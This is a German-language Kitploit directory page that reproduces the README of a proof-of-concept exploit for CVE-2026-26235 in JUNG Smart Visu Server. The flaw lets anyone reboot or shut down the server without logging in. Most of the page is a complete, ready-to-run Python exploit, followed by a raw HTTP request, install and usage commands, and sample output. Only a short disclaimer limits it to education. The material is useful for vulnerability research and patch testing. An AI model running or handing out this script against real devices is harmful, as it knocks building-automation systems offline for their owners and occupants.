Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown — Proof-of-Concept-Exploit für CVE-2026-26235, eine nicht authentifizierte Denial-of-Service-Schwachstelle im JUNG Smart Visu Server <=1.1.1050, die einen Remote-Neustart oder ein Herunterfahren über exponierte CGI-Endpunkte ermöglicht. | Kitploit
Tools/GitHubGitHub/mbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown
IoT-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubmbanyamer/cve-2026-26235-jung-smart-visu-server-unauthenticated-reboot-shutdown

CVE-2026-26235-JUNG-Smart-Visu-Server-Unauthenticated-Reboot-Shutdown

Proof-of-Concept-Exploit für CVE-2026-26235, eine nicht authentifizierte Denial-of-Service-Schwachstelle im JUNG Smart Visu Server <=1.1.1050, die einen Remote-Neustart oder ein Herunterfahren über exponierte CGI-Endpunkte ermöglicht.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 6 MonatenNoch nicht geprüft

👤 Autor

Mohammed Idrees Banyamer

  • 📍 Land: Jordanien
  • 📸 Instagram: @banyamer_security

Python Version CVE CVSS CWE Author

Proof-of-Concept-Exploit für CVE-2026-26235 – Nicht authentifizierter Denial of Service durch fehlende Authentifizierung im JUNG Smart Visu Server ≤ 1.1.1050.


🚨 Beschreibung der Schwachstelle

CVE-2026-26235 ist eine nicht authentifizierte Denial-of-Service-Schwachstelle im JUNG Smart Visu Server in Versionen ≤ 1.1.1050. Das Produkt implementiert keine Authentifizierung für kritische Systemverwaltungsfunktionen, sodass entfernte Angreifer den Server mit einer einzigen POST-Anfrage neu starten oder herunterfahren können.

Die Endpunkte /cgi-bin/reboot.sh und /cgi-bin/shutdown.sh sind ohne jegliche Authentifizierungsprüfungen exponiert. Für die Auslösung dieser Systembefehle sind keine Sitzungstokens, API-Schlüssel oder Anmeldedaten erforderlich.

Dies ermöglicht:

  • Nicht authentifizierter Systemneustart/-herunterfahren
  • Keine Benutzerinteraktion erforderlich
  • Vollständige Unterbrechung des Dienstes
  • Anhaltender Denial of Service

🎯 Betroffene Versionen

StatusVersion
❌ VerwundbarJUNG Smart Visu Server ≤ 1.1.1050
✅ BehobenNoch nicht veröffentlicht

Getestet auf: JUNG Smart Visu Server 1.1.1050, Embedded Linux


💥 Auswirkungen


🔬 Technische Details

Grundursache

  1. Fehlende Authentifizierung – CWE-306: Das Produkt führt keine Authentifizierung für kritische Systemfunktionen durch
  2. Exponierte CGI-Endpunkte – /cgi-bin/reboot.sh und /cgi-bin/shutdown.sh sind öffentlich zugänglich
  3. Keine Sitzungsvalidierung – Es findet keine Überprüfung von Cookies, Tokens oder Anmeldedaten statt
  4. Direkte Ausführung von Systembefehlen – CGI-Skripte führen System-Neustart-/Herunterfahrbefehle ohne Berechtigungsprüfungen aus

Ablauf der Schwachstelle

root@kitploit:~
Angreifer → POST /cgi-bin/reboot.sh → Keine Authentifizierungsprüfung → Systemneustart → DoS
Angreifer → POST /cgi-bin/shutdown.sh → Keine Authentifizierungsprüfung → Systemherunterfahren → DoS

🛠️ Proof of Concept

Python-Exploit-Skript

root@kitploit:~
#!/usr/bin/env python3
# Exploit Title: JUNG Smart Visu Server - Unauthenticated Remote Reboot/Shutdown
# CVE: CVE-2026-26235
# Date: 2026-02-12
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/banyamer-security
# Vendor Homepage: https://www.jung.de
# Software Link: https://www.jung.de/smart-visu-server
# Vulnerable: JUNG Smart Visu Server <= 1.1.1050
# Tested on: JUNG Smart Visu Server 1.1.1050
# Category: Web Application
# Platform: Embedded/Linux
# Exploit Type: Missing Authentication (CWE-306)

import requests
import sys
import argparse
from urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def print_banner():
    print("\n" + "="*60)
    print(" JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC")
    print(" CVE-2026-26235 | CWE-306")
    print("="*60 + "\n")

def exploit(target, action="reboot", verify_ssl=False, timeout=10):
    endpoints = {
        "reboot": "/cgi-bin/reboot.sh",
        "shutdown": "/cgi-bin/shutdown.sh"
    }
    
    if action not in endpoints:
        print(f"[-] Invalid action: {action}. Choose 'reboot' or 'shutdown'.")
        return False
    
    url = f"{target.rstrip('/')}{endpoints[action]}"
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0",
        "Content-Type": "application/x-www-form-urlencoded",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Connection": "keep-alive",
        "Upgrade-Insecure-Requests": "1",
        "Sec-Fetch-Dest": "document",
        "Sec-Fetch-Mode": "navigate",
        "Sec-Fetch-Site": "same-origin",
        "Sec-Fetch-User": "?1",
        "Cache-Control": "max-age=0",
        "Origin": target.rstrip('/'),
        "Referer": f"{target.rstrip('/')}/",
        "DNT": "1",
        "Sec-GPC": "1"
    }
    
    print(f"[*] Target      : {url}")
    print(f"[*] Action      : {action.upper()}")
    print(f"[*] SSL Verify  : {verify_ssl}")
    print("[*] Sending unauthenticated POST request...\n")
    
    try:
        response = requests.post(
            url, 
            headers=headers,
            data="",  
            verify=verify_ssl,
            timeout=timeout,
            allow_redirects=False
        )
        
        print(f"[+] Request sent successfully!")
        print(f"[+] HTTP Status : {response.status_code}")
        
        if response.status_code == 200:
            print("[!] Server responded with 200 OK - action likely executed")
        elif response.status_code == 302 or response.status_code == 301:
            print("[!] Server responded with redirect - action may have been triggered")
        else:
            print(f"[?] Unexpected response code: {response.status_code}")
        
        if response.text:
            print(f"[*] Response preview: {response.text[:200].strip()}")
        
        print("\n[!] If successful, the target server should now be restarting or shutting down.")
        return True
        
    except requests.exceptions.Timeout:
        print("[-] Connection timeout. The server may be down or unreachable.")
        print("[*] This could indicate successful DoS if the server was previously reachable.")
        return True
    except requests.exceptions.ConnectionError as e:
        print(f"[-] Connection error: {e}")
        print("[*] The server may have gone down - possibly successful exploitation.")
        return True
    except Exception as e:
        print(f"[-] An error occurred: {e}")
        return False

def main():
    print_banner()
    
    parser = argparse.ArgumentParser(
        description="PoC for CVE-2026-26235 - JUNG Smart Visu Server Unauthenticated Reboot/Shutdown"
    )
    parser.add_argument(
        "target",
        help="Target server URL (e.g., https://192.168.1.100:8080)"
    )
    parser.add_argument(
        "-a", "--action",
        choices=["reboot", "shutdown"],
        default="reboot",
        help="Action to perform: reboot or shutdown (default: reboot)"
    )
    parser.add_argument(
        "-k", "--insecure",
        action="store_false",
        dest="verify_ssl",
        default=False,
        help="Disable SSL certificate verification (default: disabled)"
    )
    parser.add_argument(
        "-t", "--timeout",
        type=int,
        default=10,
        help="Request timeout in seconds (default: 10)"
    )
    
    args = parser.parse_args()
    
    print(f"[*] Starting exploit against: {args.target}\n")
    
    success = exploit(
        target=args.target,
        action=args.action,
        verify_ssl=args.verify_ssl,
        timeout=args.timeout
    )
    
    if success:
        print("\n[+] Exploit completed successfully.")
    else:
        print("\n[-] Exploit failed.")
        sys.exit(1)

if __name__ == "__main__":
    main()

Rohe HTTP-Anfrage

root@kitploit:~
POST /cgi-bin/reboot.sh HTTP/1.1
Host: 192.168.1.100:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:135.0) Gecko/20100101 Firefox/135.0
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Cache-Control: max-age=0
Origin: http://192.168.1.100:8080
Referer: http://192.168.1.100:8080/
DNT: 1
Sec-GPC: 1
Content-Length: 0


📦 Installation

root@kitploit:~
git clone https://github.com/banyamer-security/CVE-2026-26235.git
cd CVE-2026-26235
pip install requests
chmod +x CVE-2026-26235.py

🚀 Verwendung

Grundlegender Neustart

root@kitploit:~
python3 CVE-2026-26235.py https://192.168.1.100:8080

Herunterfahren

root@kitploit:~
python3 CVE-2026-26235.py https://192.168.1.100:8080 -a shutdown

SSL-Überprüfung deaktivieren

root@kitploit:~
python3 CVE-2026-26235.py https://smartvisu.local -k

Benutzerdefiniertes Timeout

root@kitploit:~
python3 CVE-2026-26235.py https://192.168.1.100:8080 -t 15

Hilfe

root@kitploit:~
python3 CVE-2026-26235.py -h

Erwartete Ausgabe

root@kitploit:~
============================================================
 JUNG Smart Visu Server - Unauthenticated Reboot/Shutdown PoC
 CVE-2026-26235 | CWE-306
============================================================

[*] Starting exploit against: https://192.168.1.100:8080

[*] Target      : https://192.168.1.100:8080/cgi-bin/reboot.sh
[*] Action      : REBOOT
[*] SSL Verify  : False
[*] Sending unauthenticated POST request...

[+] Request sent successfully!
[+] HTTP Status : 200
[!] Server responded with 200 OK - action likely executed

[!] If successful, the target server should now be restarting.
[+] Exploit completed successfully.

📚 Referenzen

  • VulnCheck Advisory
  • Zero Science Lab - ZSL-2026-5971
  • CWE-306: Missing Authentication for Critical Function
  • NVD - CVE-2026-26235 (ausstehend)

👤 Autor

Mohammed Idrees Banyamer

  • 📍 Land: Jordanien
  • 📸 Instagram: @banyamer_security
  • 🐙 GitHub: banyamer-security
  • 🔗 LinkedIn: Mohammed Banyamer
  • 📧 E-Mail: [email protected]

⚠️ Haftungsausschluss

Dieser Proof-of-Concept-Exploit wird nur für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt. Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch diese Software verursacht werden.

Nicht autorisierte Tests gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Testgenehmigung haben, sind illegal.


📄 Lizenz

MIT-Lizenz

Copyright (c) 2026 Mohammed Idrees Banyamer

Hiermit wird jeder Person, die eine Kopie dieser Software und der zugehörigen Dokumentationsdateien (die „Software") erhält, kostenlos die Erlaubnis erteilt, die Software ohne Einschränkung zu nutzen, einschließlich und ohne Einschränkung der Rechte zur Verwendung, Vervielfältigung, Änderung, Zusammenführung, Veröffentlichung, Verteilung, Unterlizenzierung und/oder zum Verkauf von Kopien der Software, und Personen, denen die Software zur Verfügung gestellt wird, dies unter den folgenden Bedingungen zu gestatten:

Der obige Urheberrechtshinweis und dieser Genehmigungshinweis müssen in allen Kopien oder wesentlichen Teilen der Software enthalten sein.

DIE SOFTWARE WIRD „WIE BESEHEN" BEREITGESTELLT, OHNE JEGLICHE AUSDRÜCKLICHE ODER IMPLIZIERTE GEWÄHRLEISTUNG, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER. IN KEINEM FALL SIND DIE AUTOREN ODER URHEBERRECHTSINHABER FÜR JEGLICHE ANSPRÜCHE, SCHÄDEN ODER ANDERE HAFTUNGEN VERANTWORTLICH, SEI ES AUS VERTRAG, UNERLAUBTER HANDLUNG ODER ANDERWEITIG, DIE SICH AUS ODER IN VERBINDUNG MIT DER SOFTWARE ODER DER NUTZUNG ODER ANDEREN GESCHÄFTEN MIT DER SOFTWARE ERGEBEN.


⭐ Unterstützung

Wenn dieser Exploit Ihrer Forschung oder Ihren Tests geholfen hat:

  • ⭐ Sternen Sie dieses Repository
  • 🔁 Teilen Sie es mit anderen Forschern
  • 📢 Folgen Sie @banyamer_security auf Instagram

Verantwortungsvolle Offenlegung • Sicherheitsforschung • CVE-2026-26235

Tool herunterladen
VektorBeschreibung
CVSS v48.7 (Hoch) - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
AuthentifizierungKeine – Vollständig ohne Authentifizierung
AngriffsvektorNetzwerk
KomplexitätNiedrig
AuswirkungHohe Auswirkung auf die Verfügbarkeit